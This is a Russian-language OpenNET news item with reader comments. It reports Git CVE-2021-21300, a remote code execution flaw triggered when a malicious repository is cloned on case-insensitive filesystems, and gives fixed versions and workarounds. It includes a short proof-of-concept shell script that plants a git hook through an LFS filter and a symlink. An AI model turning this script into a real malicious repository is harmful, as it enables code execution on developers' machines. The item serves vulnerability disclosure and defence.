The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Обновление Git с устранением уязвимости, допускающей удалённое выполнение кода

09.03.2021 22:42

Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.30.2, 2.17.6, 2.18.5, 2.19.6, 2.20.5, 2.21.4, 2.22.5, 2.23.4, 2.24.4, 2.25.5, 2.26.3, 2.27.1, 2.28.1 и 2.29.3, в которых устранена уязвимость (CVE-2021-21300), позволяющая организовать удалённое выполнение кода при клонировании репозитория злоумышленника с использованием команды "git clone". Уязвимости подвержены все выпуски Git, начиная с версии 2.15.

Проблема проявляется при использовании отложенных операций checkout, которые применяются в некоторых фильтрах очистки, например, настраиваемых в Git LFS. Эксплуатация уязвимости возможна только в файловых системах, не различающих регистр символов, но поддерживающих символические ссылки, таких как NTFS, HFS+ и APFS (т.е. на платформах Windows и macOS).

В качестве обходного пути защиты можно отключить в git обработку символических ссылок, выполнив "git config --global core.symlinks false", или отключить поддержку процессов-фильтров при помощи команды "git config --show-scope --get-regexp 'filter\..*\.process'". Также рекомендуется избегать клонирования непроверенных репозиториев.

Дополнение: Опубликован прототип эксплоита:



#!/bin/sh

  git init delayed-checkout &&
  (
  	cd delayed-checkout &&
  	echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
  		>.gitattributes &&
  	mkdir A &&
  	printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
  	chmod +x A/post-checkout &&
  	>A/a &&
  	>A/b &&
  	git add -A &&
  	rm -rf A &&
  	ln -s .git/hooks a &&
  	git add a &&
  	git commit -m initial
  ) &&
  git clone delayed-checkout cloned


  1. Главная ссылка к новости (https://github.blog/2021-03-09...)
  2. OpenNews: Критическая уязвимость в Git LFS, проявляющаяся на платформе Windows
  3. OpenNews: Обновление Git с устранением ещё одной уязвимости
  4. OpenNews: Уязвимость в Git, приводящая к утечке учётных данных
  5. OpenNews: Обновление Git с устранением 8 уязвимостей
  6. OpenNews: В Git устранена уязвимость, которая может привести к выполнению кода атакующего
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/54730-git
Ключевые слова: git
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (38) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 22:56, 09/03/2021 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +3 +/
     

     ....ответы скрыты (9)

  • 1.3, Аноним (3), 23:13, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Так вроде же NTFS сама по себе регистрозависимая, а вот нелепая надстройка над ней- нет
     
     
  • 2.20, commiethebeastie (ok), 01:46, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Даже FAT32 регистрозависимая. Есть же фокус, создаешь под линуксом две директории с одинаковым названием и в венде обе директории открывают какую-либо одну.
     
  • 2.26, Аноним (25), 03:46, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Так вроде же NTFS сама по себе регистрозависимая, а вот нелепая надстройка
    > над ней- нет

    Ну так совместимость же. С MSDOS и WIN95, трололо. Скажите спасибо что хоть не 8.3 :)

     
     
  • 3.33, Аноним (33), 09:48, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Формат 8.3 по сей день "основной" в FAT. LFN оформлены как отдельные записи в директории со специальным сочетанием атрибутов, некорректным для MS-DOS.
     
  • 3.38, commiethebeastie (ok), 11:43, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >> Так вроде же NTFS сама по себе регистрозависимая, а вот нелепая надстройка
    >> над ней- нет
    > Ну так совместимость же. С MSDOS и WIN95, трололо. Скажите спасибо что
    > хоть не 8.3 :)

    Причем тут короткие имена файлов? Создаешь под линуксом на FAT32 устройстве два каталога Folder и folder и кладешь туда разные файлы и о чудо, под линуксом они работают. Открываешь под вендой, видишь 2 каталога, но приводят они в один.

     
     
  • 4.42, nuclight (??), 14:38, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    И кто сказал, что линуксовая реализация в этом месте не нарушает стандарт?
     
     
  • 5.44, Аноним (44), 17:11, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    а должна?
     
  • 2.37, Аноним (37), 11:25, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Насколько я помню, это сама NTFS может быть регистрозависимой или нет, в т.ч. на уровне директории.
     
  • 2.46, Тот_Самый_Анонимус (?), 08:34, 17/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Она регистронезависимая. Регистрозависим виндовый драйвер.
     

  • 1.9, Аноним (9), 23:46, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Недавно же клонирование уже фиксили... Сколько там ещё уязвимостей осталось?
     
     
     
    Часть нити удалена модератором

  • 3.16, Annoynymous (ok), 00:25, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Эксплуатация уязвимости возможна только в файловых системах, не различающих регистр символов, но поддерживающих символические ссылки, таких как NTFS, HFS+ и APFS (т.е. на платформах Windows и macOS).
     
     
  • 4.19, Anonymousqwe (?), 00:49, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Но баг же не связан с файловой системой. А Гит пишут люди использующие Линукс
     
     
  • 5.29, hefenud (ok), 04:40, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    А еше эти люди едят огурцы. Я думаю, что виноваты огурцы.
     
  • 5.40, Бывалый (?), 13:49, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > пишут люди

    Вот где самая мякотка

     
  • 4.23, zzz (??), 03:34, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Баг не в ФС, а в гит.
     

  • 1.18, Аноним (18), 00:39, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Git 2.30.2, 2.17.6, 2.18.5, 2.19.6, 2.20.5, 2.21.4, 2.22.5, 2.23.4, 2.24.4, 2.25.5, 2.26.3, 2.27.1, 2.28.1 и 2.29.3

    Ставить все сразу.

     
  • 1.21, Аноним (21), 01:49, 10/03/2021 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +/
     

     ....ответы скрыты (4)

  • 1.32, Бывалый (?), 09:24, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    > рекомендуется избегать клонирования непроверенных репозиториев

    Да как же их проверить если клонировать нельзя!

     
     
  • 2.34, Аноним (34), 09:55, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Смотреть но не трогать.
     

  • 1.36, Аноним (36), 10:26, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –9 +/
    наглядный пример того, к чему приводит использование устаревшего Си
     
     
  • 2.41, ford1813 (ok), 14:05, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Наглядный пример того, что некоторые кроме заголовка ничего не читают.
     

  • 1.39, Аноним (39), 13:28, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Хорошо что я пользуюсь SVN!
     
  • 1.43, Аноним (43), 15:43, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Эксплуатация уязвимости возможна только в файловых системах, не различающих регистр символов, но поддерживающих символические ссылки, таких как NTFS, HFS+ и APFS (т.е. на платформах Windows и macOS).

    А так же на ext4 при использовании новомодных опций.

     
     
  • 2.45, Аноним (45), 07:25, 11/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    case-insensitive режим в ext4 включается выборочно для отдельных директорий. Трудно представить себе ситуацию, когда кто-то в здравом уме переключит ext4 в case-insensitive для директории с git.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру